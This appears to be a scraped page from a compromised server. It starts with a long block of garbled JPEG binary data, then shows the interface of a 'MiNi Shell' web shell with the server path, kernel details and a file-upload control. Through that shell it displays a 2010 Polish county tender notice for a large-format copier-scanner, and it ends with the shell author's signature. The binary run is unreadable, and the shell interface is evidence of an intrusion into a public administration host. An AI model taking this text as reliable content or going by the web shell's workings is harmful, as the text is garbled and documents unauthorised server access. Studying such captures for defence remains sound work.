JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20101116/370220-N-2010.html

<p class="kh_header"><b>Złotoryja: Dostawa kopiująco- drukująco- skanującego urządzenia wielkoformatowego do tworzenia i archiwizacji dokumentacji wraz z oprogramowaniem</b><br>
<b>Numer ogłoszenia: 370220 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Złotoryi , Pl. Niepodległości 8, 59-500 Złotoryja, woj. dolnośląskie, tel. 076 8786940, -950, faks 076 8786955.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-zlotoryja.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kopiująco- drukująco- skanującego urządzenia wielkoformatowego do tworzenia i archiwizacji dokumentacji wraz z oprogramowaniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa i zainstalowanie kopiująco- drukująco- skanującego urządzenia wielkoformatowego do tworzenia i archiwizacji dokumentacji wraz z oprogramowaniem.
2. Kopiująco- drukująco- skanujące urządzenie wielkoformatowe do tworzenia i archiwizacji dokumentacji z oprogramowaniem, musi spełniać niżej wymienione parametry:
A)Funkcje podstawowe:
a) drukowanie, kopiowanie i skanowanie dokumentacji kolorowej i czarnobiałej.
b) jedno kompaktowe urządzenie z maksymalnie jednym wbudowanym panelem operatorskim do obsługi funkcji drukowania, kopiowania i skanowania.
c) urządzenie musi być fabrycznie nowe - pod tym terminem Zamawiający rozumie urządzenie nie regenerowane, nie instalowane nigdy wcześniej w żadnym celu, wyprodukowane nie wcześniej niż 6 miesięcy przed jego dostawą do Zamawiającego.
d) urządzenie powinno mieć możliwość jednoczesnego drukowania i przetwarzania zadań kopiowania lub skanowania.
e) wbudowany polskojęzyczny, kolorowy panel operatorski urządzenia oraz całe dostarczone oprogramowanie do komunikacji z urządzeniem oraz obsługi ze sterownikami wyłącznie w języku polskim. Wszelkie komunikaty urządzenia i oprogramowania (np. o błędach w urządzeniu czy systemie), wyświetlane informacje o stanie i ustawieniach całego systemu minimum w zakresie informacji o założonych nośnikach (rozmiar, rodzaj), obciążeniu modułu drukującego (zadania oczekujące na wydruk, nazwa użytkownika), stanie urządzenia (drukowanie, wolne) na stanowiskach użytkowników muszą być w języku polskim.
f) urządzenie powinno posiadać narzędzia do komunikacji sieciowej umożliwiające wyświetlanie na stanowiskach komputerowych stanu zadania kopiowania i drukowania, oraz anulowania, wstrzymania lub wznowienia całego zadania oraz ponownego wykonania zadań przechowanych w folderze historii zadań;
g) urządzenie musi posiadać 2-rolkowy podajnik automatyczny materiału z automatycznym obcinaniem. System mocowania mediów z samoczynnym wyśrodkowaniem założonego medium, z ładowaniem mediów oraz zasobników z atramentem od przodu bez konieczności przemieszczania urządzenia czy też zatrzymywania urządzenia podczas drukowania lub kopiowania.
h) urządzenie musi posiadać możliwość rozbudowy o zintegrowaną, górną tacę odbioru kopii  i wydruków zapewniającą możliwość sortowania prac na zestawy zadań rozumiane jako możliwość tworzenia zestawów prac podczas kopiowania bezpośrednio z wbudowanego panela operatorskiego z automatycznym sortowaniem na zestawy (zestaw pierwszy 1,2,3,4,5 rysunek, zestaw drugi 1,2,3,4,5 rysunek itd. w zależności od liczby zaprogramowanych zestawów);
i) urządzenie musi posiadać możliwość zaprogramowania i zapamiętania pod zadaną nazwą min. 4 szablonów widocznych na panelu operatorskim urządzenia. Wybieranie z panela operatorskiego urządzenia odpowiedniego szablonu, musi powodować przyporządkowanie ustawień w minimalnym zakresie dla: rodzaju kopiowanego-skanowanego oryginału, przeskalowania, destynacji, obrotów, trybu jakości, automatycznego czyszczenie tła z jednoczesnym rozpoznawaniem i wzmocnieniem słabo widocznej informacji (linii).
B) Drukowanie
a) technologia druku: atramentowa oparta na głowicach termicznych.
b) rozdzielczość druku min. 600x600 dpi
c) szerokość druku min. 910 mm
d) rodzaje mediów: (papier powlekany, niepowlekany, kalka, folia, papier fotograficzny)
e) system powinien być wyposażony w oprogramowanie do emisji wydruków w języku polskim oparte na technologii internetowej umożliwiające: uzyskanie zwrotnej informacji o statusie drukarki, kolejce zadań, definiowanie zestawów drukowania
f) wbudowany w panel operatora port USB umożliwiający bezpośredni wydruk z pamięci USB prac formatu A1,A0, lub o szerokości 914mm.
g) monitorowanie poziomu atramentów ze wskazaniem w procentach, sygnalizacja wyczerpania się atramentów oraz możliwość wymiany pojemników z atramentem podczas drukowania bez konieczności zatrzymywania urządzenia.
h) wbudowany w urządzenie kontroler wewnętrzny o minimalnych parametrach: 1 GB pamięci operacyjnej, 160 GB dysk twardy.
C) Kopiowanie
a) bazowe funkcje kopiowania (wybór rolki, zmiana skali, zmiana ekspozycji, szablony kopiowania, przesunięcie, wyrównanie, odbicie lustrzane, kopiowanie fragmentu oryginału, ilość kopii) muszą być wybierane z polskojęzycznego, wbudowanego panelu operatorskiego.
b) automatyczne rozpoznawanie szerokości oryginału i automatyczny wybór rolki z założonym podłożem o minimalnej szerokości pozwalającej na uzyskanie całego obrazu.
D) Skanowanie do pliku
a) typ skanera: Contact Image Sensor (CIS)
b) rozdzielczość fizyczna skanera 600 x 600 dpi
c) szerokość skanowanego obrazu min 910 mm
d) skanowanie do dowolnej, zdefiniowanej przez użytkownika lokalizacji w sieci
e) skanowanie do pamięci USB na wbudowany w panel operatora port USB
f) formaty danych: TIFF, PDF-A, JPEG, wielostronicowe pliki TIFF& PDF-A
g) możliwość definiowania szablonów skanowania wybieranych z panelu operatorskiego
h) automatyczne rozpoznawania szerokości oryginału podczas skanowania.
i) wydajność systemu:
- czarno-biały rysunek formatu A0 w ciągu maksymalnie 45 sekund
- kolorowy rysunek formatu A0 w ciągu maksymalnie 65 sekund.
Potwierdzeniem wydajności systemu musi być odpowiedni zapis w oficjalnej ulotce urządzenia.
3. Dostarczone urządzenie powinno być gotowe do pracy. Pakiet startowy powinien zawierać co najmniej:
a) głowice drukujące,
b) atramenty startowy,
c) rolkę papieru o szerokości 914 mm.
4. Serwis gwarancyjny świadczony bezpośrednio przez pracowników wykonawcy posiadających odpowiednie certyfikaty producenta potwierdzające ich kwalifikacje do naprawy urządzenia.
5. Warunki serwisu gwarancyjnego: 
a) w trakcie trwania gwarancji Wykonawca zapewni bezpłatny (wyłączając uszkodzenia będące wynikiem niewłaściwej obsługi przez użytkownika) serwis gwarancyjny świadczony w siedzibie Zamawiającego; 
b) gotowość serwisu (przyjmowanie zgłoszeń o awarii) w dni robocze w godzinach 8:00-15:00;
c) Zamawiający będzie zgłaszał awarie w dni robocze w godzinach 8:00-15:00 za pośrednictwem faksu lub drogą elektroniczną; 
d) Wykonawca zobowiązany jest przystąpić do usunięcia awarii w ciągu 2 dni kalendarzowych, od dnia zgłoszenia awarii; 
d) standardowy czas naprawy wynosi 5 dni kalendarzowych, od dnia zgłoszenia awarii; 
e) w przypadku konieczności wymiany podzespołów trudno dostępnych, naprawa może trwać 10 dni kalendarzowych (licząc od dnia zgłoszenia awarii), wówczas okres gwarancji będzie wydłużany                   
f) w przypadku konieczności dokonania naprawy sprzętu poza siedzibą Zamawiającego, wszelkie nośniki z danymi zapisanymi przez Zamawiającego, pozostają zabezpieczone u Zamawiającego; 
6. Wykonawca na dostarczony sprzęt zobowiązuje się udzielić minimum 36 miesięcy gwarancji i rękojmii, licząc od dnia poprawnego zainstalowania urządzenia.
7. Wykonawca przeprowadzi szkolenie co najmniej 4 pracowników w zakresie prawidłowej obsługi urządzenia w siedzibie Zamawiającego, w terminie 3 dni od dnia dostarczenia i zainstalowania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w prowadzonym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do złożenia oświadczenia w trybie art. 22 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do złożenia oświadczenia w trybie art. 22 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do złożenia oświadczenia w trybie art. 22 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do złożenia oświadczenia w trybie art. 22 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do złożenia oświadczenia w trybie art. 22 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sp-zlotoryja.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Złotoryi, pl. Niepodległości 8, 59-500 Złotoryja, pokój nr 306..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2010 godzina 11:00, miejsce: Starostwo Powiatowe w Złotoryi, pl. Niepodległości 8, 59-500 Złotoryja, pokój nr 306..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com